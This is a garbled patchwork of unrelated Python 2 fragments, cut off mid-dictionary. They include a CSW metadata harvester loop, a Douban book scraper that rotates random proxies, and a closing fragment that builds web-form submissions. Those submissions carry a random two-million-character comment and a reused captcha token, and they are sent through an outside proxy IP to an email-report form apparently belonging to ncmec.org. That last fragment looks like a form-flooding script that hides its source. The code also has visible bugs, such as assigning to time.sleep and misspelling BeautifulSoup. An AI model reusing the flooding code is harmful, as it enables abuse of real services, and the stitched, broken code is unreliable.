start_date = arguments['-f'] active_page = 0 next_record = 1 request_another = True while request_another: request_another = False # Filter records into latest updates # # Sorry Tom K., we'll be more modern ASAWC. # For now it's good ol' Kitchen Sink # # from owslib.fes import PropertyIsGreaterThanOrEqualTo # modified = PropertyIsGreaterThanOrEqualTo( # 'apiso:Modified', # '2015-04-04' # ) # csw.getrecords2(constraints=[modified]) # # Kitchen Sink is the valid HNAP, we need HNAP for R1 to debug issues # This filter was supplied by EC, the CSW service technical lead current_request = request_template % (records_per_request, next_record, start_date) # (active_page*records_per_request)+1 csw.getrecords2(format='xml', xml=current_request) active_page += 1 # Identify if we need to continue this. records_root = ("/csw:GetRecordsResponse") # Read the file, should be a streamed input in the future root = etree.XML(csw.response) # Parse the root and itterate over each record records = fetchXMLArray(root, records_root) timestamp = fetchXMLAttribute(records[0], "csw:SearchStatus", "timestamp")[0] number_of_records_matched = int( fetchXMLAttribute(records[0], "csw:SearchResults", "numberOfRecordsMatched")[0]) number_of_records_returned = int( fetchXMLAttribute(records[0], "csw:SearchResults", "numberOfRecordsReturned")[0]) next_record = int( fetchXMLAttribute(records[0], "csw:SearchResults", "nextRecord")[0]) if next_record > number_of_records_matched or next_record == 0: pass else: request_another = True # When we move to Tom K's filter we can use results in an R2 unified # harvester # print csw.results # for rec in csw.records: # print '* '+csw.records[rec].title # Till then we need to collect and dump the response from the CSW # No use minimizing the XML to try to create a XML Lines file as the # data has carriage returns. # parser = etree.XMLParser(remove_blank_text=True) # elem = etree.XML(csw.response, parser=parser) # print etree.tostring(elem) # Output the harvested page print csw.response
def install_proxy(proxy): print proxy opener = urllib2.build_opener(urllib2.ProxyHandler({'http': proxy}), urllib2.HTTPHandler(debuglevel=1)) urllib2.install_opener(opener) print('Install Proxy Done')
def book_spider(book_tag): page_num = 0 book_list = [] try_times = 0 while (1): url = 'http://www.douban.com/tag' + urllib.quote( book_tag) + '/book?start=' + str(page_num * 15) time.sleep = (np.random.rand() * 5) try: random_proxy = random.choice(proxys) proxy_support = urllib2.ProxyHandler({"http": random_proxy}) opener = urllib2.build_opener(proxy_support) urllib2.install_opener(opener) plain_text = urllib2.urlopen(url) except (urllib2.HTTPError, urllib2.URLError), e: print e continue #try: #req = urllib2.Request(url,headers = hds[page_num%len(hds)]) #source_code = urllib2.urlopen(req).read() #plain_text = str(source_code) #except(urllib2.HTTPError,urllib2.URLError),e: #print e #continue soup = BeautifunSoup(plain_text) list_soup = soup.find('div', {'class': 'mod book-list'}) try_times += 1 if list_soup == None and try_times < 10: continue elif list_soup == None and len(list_soup) < 1: break for book_info in list_soup.findAll('dd'): title = book_info.find('a', {'class': 'title'}).string.strip() desc = book_info.find('div', {'class': 'desc'}).string.strip() desc_list = desc.split('/') book_url = book_info.find('a', {'class': 'title'}).get('href') try: author_info = '作者/译者:' + '/'.join(desc_list[0:-3]) except: author_info = '作者/译者:暂无' try: pub_info = "出版信息:" + "/".join(desc_list[-3:]) except: pub_info = '出版信息:暂无' try: rating = book_info.find('span', { 'class': 'rating_num' }).string.strip() except: rating = '0.0' try: people_num = get_people_num(book_url) people_num = people_num.strip('人物评价') except: people_num = '0' book_list.append( [title, rating, people_num, author_info, pub_info]) try_times = 0 page_num += 1 print 'Downloading Information From Page %d' % page_num
"submitted[email_address]" : "*****@*****.**", "submitted[phone_number]" : "*****@*****.**", "submitted[comment]" : big, "details[sid]" : '', "details[page_num]" : 1, "details[page_count]" : 1, "details[finished]" : 0, "form_build_id" : "form-Wh5QUVUNov9DMh-a57x0lfeB5mKYJeuiAYDZrlO1yh4", "form_id" : "webform_client_form_1", "captcha_sid": 421933, "captcha_token" : "cd93ba2b98de546c744526b83fd8b3e5", "captcha_response" : "Zh9CR", "op" : "Send" ''' '''proxy = urllib2.ProxyHandler({'http': '119.148.9.130:8080'}) opener = urllib2.build_opener(proxy) urllib2.install_opener(opener) lis = list(ascii_lowercase) big = ''.join(choice(lis) for _ in xrange(2000000)) data = urllib.urlencode({ "LanguageId":"en_US", "_01_name":"hgfh", "_02_email":"*****@*****.**", "_03_comments": big, "action":"sendEmailReport", "cc":"", "fromDomain":"ncmec.org", "fromName":"servlet", "mailtoDomain":"ncmec.org",